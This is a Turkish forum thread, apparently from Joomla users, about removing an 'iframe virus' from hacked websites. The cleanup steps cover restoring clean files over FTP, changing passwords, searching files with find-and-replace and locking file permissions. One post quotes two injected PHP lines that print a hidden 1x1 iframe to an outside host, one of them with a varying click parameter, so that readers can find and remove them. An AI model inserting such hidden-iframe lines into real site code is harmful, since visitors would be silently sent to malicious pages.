İframe Vb Virüs Temizleme...

[tolga]

Arkadaşlar sitemize bazen virüsler girebiliyor. Örneğin iframe virüsü bu virüsü nasıl temizleriz onu anlatmaya çalışacağım

Önce Bilgisayarımıza Bir Dosya Açıyoruz Misal Puplıc Diye Sonra Ftp'yi Açıyoruz.Puplıc_html Klasörünü Tamamen O Açtığımız Puplıc Klasörünün İçine Atıyoruz. Sonra Atma İşlemi Bittikten Sonra Açtığımız Klasör Olan Puplıc Klasörünü Ant-i Virüs Programımızla Temizliyoruz... Sonra Ftp'deki Puplıc Html Klasörünün İçindeki Tüm Dosyaları Siliyoruz.(Korkmayın Sitenize Birşey Olmaz!) Sonra Sildikten Sonra Puplıc Klasörünün İçindeki Temizlediğimiz Dosyaların Hepsini Tekrar Ftp'ye Atıyoruz. İşlemimiz Bitmiştir...

Saygılarımla...

[alfamet]

tskler kardes

[sternvalue]

sağolasın dostum ama dosyanın adı public olması gerekiyor bilgilendirdiğin için teşekkürler.

[tolga]

Yok Dosya İstediğimiz İsimde Olabilir Ben En Mantıklı Olanı Koydum. Yani İstediğiniz İsmi Koyabilirsiniz.

[sabbath]

eminsiniz dimi bir sakatlık çıkarmayacağından?

[broken_wings]

Benim daha basit bir yöntemim var.FTP şifremi değiştiriyorum.Hangi sürümü kurduysam o sütümün install klasörü ve configration.php haricini direkt üstüne atıyorum.Sonra eski temamı silip yenisini hatta sıfırdan başka tema kullanıyorum.Sonra sorun kalmıyor.

[tolga]

Bu Şekildede Çözülebilir Fakat Bazı Arkadaşlarımız Yapamayabiir

[BozkurtJK]

slmlar!
iframe bir kod virüsüdür! index.php veya index.html ye bulaşabilir aynı zamanda default.html vb..
kaspersky in index.php vb.. içindeki iframe virüsünü temizlediğini hiç görmedim!
temizleyeceğinide sanmıyorum.

yapılacak tek şey (joomla) sitenzdeki tüm index.html dosyalarınındaki iframe kodunu silmek olacaktır. (joomla) da her klasörde 1 tane index vardır yani iframe virüsünü temizleme saatlerce sürecektir.

[KaYRa]

Bu konuda yazılanları toplayayım en iyisi...

iframe virüsünden kurtulmak için yapılması gerekenler.

1. Bilgisayarınızı Combofix ile tarayın.
Tarama yapıldıktan sonra bilgisayar yeniden başlatılır.
Benim pc yeniden başlarkene NTLDR eksik hatası verdi. Windows kurulum cd si ile onar yaptım, onarmadı nedendir çözemedim. Neyse dedim eski kullanıcıya dokunmadan yeni windows kurdum ve önceki oturumumdaki dosyalarımı yeni kurduğum oturuma attım bu sayede eski dosyalarım gitmemiş oldu.


2. Bilgisayarımızda ftp programı var ise ftp bilgilerimizi bi not defterine yazalım dandik vs ftp programları kullanabilirsiniz diye söylüyorum ftp programınızı kaldırın ve sonrasında ise avast antivürüs indirip bilgisyarınıza kurun.

3. FTP deki dosyalarınızı bilgisayarınıza indirin, indirirken zaten frame olan dosyalarınız indiği sırada antivirüs devreye girecek ve site hangi dosyanızın virüslü olduğunu yazacak, buraya bakaraktan hangi dosyalara bulaşmış görebilirsiniz.

4. İndirdiğiniz dosyaları virüs taraması yapabilirsiniz. Fakat deneme yaptım frame olan dosyaları göstermedi yani antivirüs de bazen işe yaramayabilir...
En güzel çözüm ise şu;
şimdi siteniz açılmayabilir fakat administrator e girebilirsiniz. administrator e girin diyorum çünki joomla sürümünüzü kontrol edin belki yükseltme yapmamışınızdır.
Joomla mız son sürüm olan 1.5.14 ise sitemizdeki Joomla 1.5.14 paketini indiriyoruz yani administrator de son sürüm ne yazıyorsa onu indirin. 1.5.13 ise 1.5.13 indirin.
Bu indirdiğiniz joomla sürümü tertemiz olduğu için ftp den bu dosyaları göndereceğiz.
Tabiki göndermeden önce ftp şifremizi değiştireceğiz, kesinlikle şifrenizi değiştirin.
Göndermeyeceğiniz dosyalar ise şunlar;
installation klasörü
configuration.php
configuration.php-dist
htaccess.txt


benim yöntemim bu, acele yazdım karıştırmadım inşallah...
Joomla sürümü atmamdaki sebep ise hangi dosyaya bulaşmış vs vs aramaktansa böyle daha iyi.

Hah birde şu var

5. Joomla sürümünden ekstra yüklü eklentileriniz var ise onları tekrardan kontrol edin mesela kurduğum sitede sobi2 yüklü ise sobi2 joomla sürüm paketinde yok ekstra bir bileşen olduğu için sobi2 klasörünü hem administrator/components hemde components klasörüne bakıp kontrol edebilirsiniz.

[geyran]

Başıma geldiği ve 3-4 siteme aynı anda bulaştığı için deneyimimi yazayım:

iframe kod virüsü olduğu için antivirüs programları temizlemez virüsü ...
Sıfır joomla paketi atıp temizlemeye çalışmak deneyimli olmayan arkadaşları sıkıntıya sokacaktır,zira kurulan eklentileri tekrar kuramayabilirsiniz...

1-)Öncelikle hostunuz düzenli yedek alıyorsa tüm dosyalarınızı silip yedeği yüklemeyi deneyin.

2-)Hostunuz yedek almamış mı,sorun değil,ftp den dosyalarınızı bilgisayarınıza indirin.

3-)Tek tek temizleyemeyiz bu kodları,standart bir joomla paketinde 900 ün üstünde index.html ve default.php var çünkü... Dreamweaver kullanmalıyız.. Dreamweaver da bul ve değiştir uygulaması vardır (find & replace) seçeneklerde sayfada mı,açık sayfalarda mı,klasörde mi diye seçenekler vardır,ftp den indirdiğimiz dosyaların bulunduğu klasörü seçip, iframe kodunun tamamını "find" kısmına yazıyoruz.Replace kısmına birşey yazmadan devam ediyoruz... Program sitedeki tüm kodları 1-2 dakikada kaldıracaktır...

4-)Tabi iframe virüsleri farklılık göstermektedir,yeni nesil virüsler her sayfaya aynı kodu atmıyor.Örnek :

echo "<iframe src=\"http://hosttracker.net\123" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";

Bu tür iframe virüsü az evvel bahsettiğim şekilde 1 dakika içinde tüm siteden temizlenir.. Aşağıda görünen virüs ise her sayfaya farklı click rakamı atarak oto temizlemeyi engeller. :

echo "<iframe src=\"http://hosttracker.net/?click=2670353\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";

Bu durumda yapmamız gereken "find & replace" değil de sadece "find" ile arama yapmaktır.Şöyle ki: Üstte verdiğim site virüs kodu ekledi varsayalım, find kısmına <iframe src=\"http://hosttracker.net/? yazıp arama yapmalıyız,kodların eklendiği tüm sayfalar altta sıralanacaktır,işte bundan sonra alttaki listede bulunan sayfaları açıp tek tek kodun tamamını silmeliyiz.Kaygılanmayın,Standart bir sitede 10-15 dakikada temizlenir.

5-) Tüm temizleme bittikten sonra son bir kontrol için find kısmına </iframe> yazıp bir arama daha yapmanızı tavsiye ederim,sizin kendi frame niz dışında başka kodlar görürseniz onları da temizleyin,bazen aynı anda 2 kod atabiliyor siteler,site ismi farklı olarak...

6-) dosyalarımız tamamen temizlendikten sonra,öncelikle girip ftp şifrenizi değiştirin,ftpden girip üst dizinleri kontrol edin,httpsdoc içersinde de rastlayacaksınız virüse...Bilgisayarınızda sağlam bir virüs taraması yapın,hatta bu temiz dosyaları başka temiz bir bilgisayardan gönderme imkanınız varsa ondan gönderin...

7-) cuteftp kullanıyorsanız özellikle crackli ise hemen silin,filezilla kullanın ve ftp şifrenizi hatırlamalı yapmayın,her kullanışta manual girin...

8-) Dosyalarınızı yazılamaz yapın,joomla chmod ayarları forumda mevcut...

SON OLARAK Bilgisayar,virüs vb konularda kendinizi yeterli olarak görmüyorsanız,virüs temizleme işini deneyimli insanlara yaptırın,gerekirse format attırın,zira bilgisayarınızda kalmış virüs,siz ftpden sitenize tekrar bağlandığınızda şifrenizi kaydedecek,kodu tekrar gönderecektir. FTP şifrenizi ara ara değiştirin.

Allah iframe den sizi korusun muvaffakiyetler